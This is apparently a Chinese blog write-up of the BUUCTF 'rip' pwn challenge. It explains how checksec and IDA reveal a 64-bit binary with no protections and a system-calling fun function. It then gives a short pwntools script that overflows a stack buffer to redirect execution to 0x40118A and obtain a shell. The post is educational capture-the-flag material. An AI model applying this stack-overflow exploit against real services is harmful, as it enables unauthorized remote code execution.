[BUUCTF-pwn]——rip

本文介绍了如何解决Buuctf平台上的一个64位栈溢出挑战,通过IDA反汇编和观察fun函数,找到利用栈溢出覆盖返回地址的方法。着重讲述了利用payload构造和exploit编写的过程,适合进阶pwn爱好者。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[BUUCTF-pwn]——rip

  • 题目地址:https://buuoj.cn/challenges#rip
  • 题目:
    在这里插入图片描述
    同样我们现将文件下载下来,在Linux上用checksec 看下信息,发现这是一个64位程序,并且任何保护都没开。😀 (任何保护都没开,基本就是栈溢出)
    在这里插入图片描述
    在window用IDA反汇编看看,打扰了main函数没有任何有用的东西,没有我们要找的system函数
    在这里插入图片描述
    看看其他函数看看有没有,功夫不负有心人。fun函数中,有我们想要的东西
    在这里插入图片描述
    赶快查看下fun函数所在的位置 0x401186 。我们看到是在0x40118A压参数,然后接着执行,所以我们可以用0x40118A将返回地址给覆盖掉。
    在这里插入图片描述
    双击变量 s,我们可以看到s到 ebp 的距离是oxf,ebd占8个字节
    在这里插入图片描述
    所以exploit可以这样写
# pwn1.py
from pwn import *
p = remote("ip地址",ip端口)
ret_arr = 0x40118A
payload ='a' * (0xf+8)+ p64(ret_arr)
p.sendline(payload)
p.interactive()

在这里插入图片描述
这是一个典型的栈溢出问题,嘿嘿,是不是比第一道好玩一点 😃

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值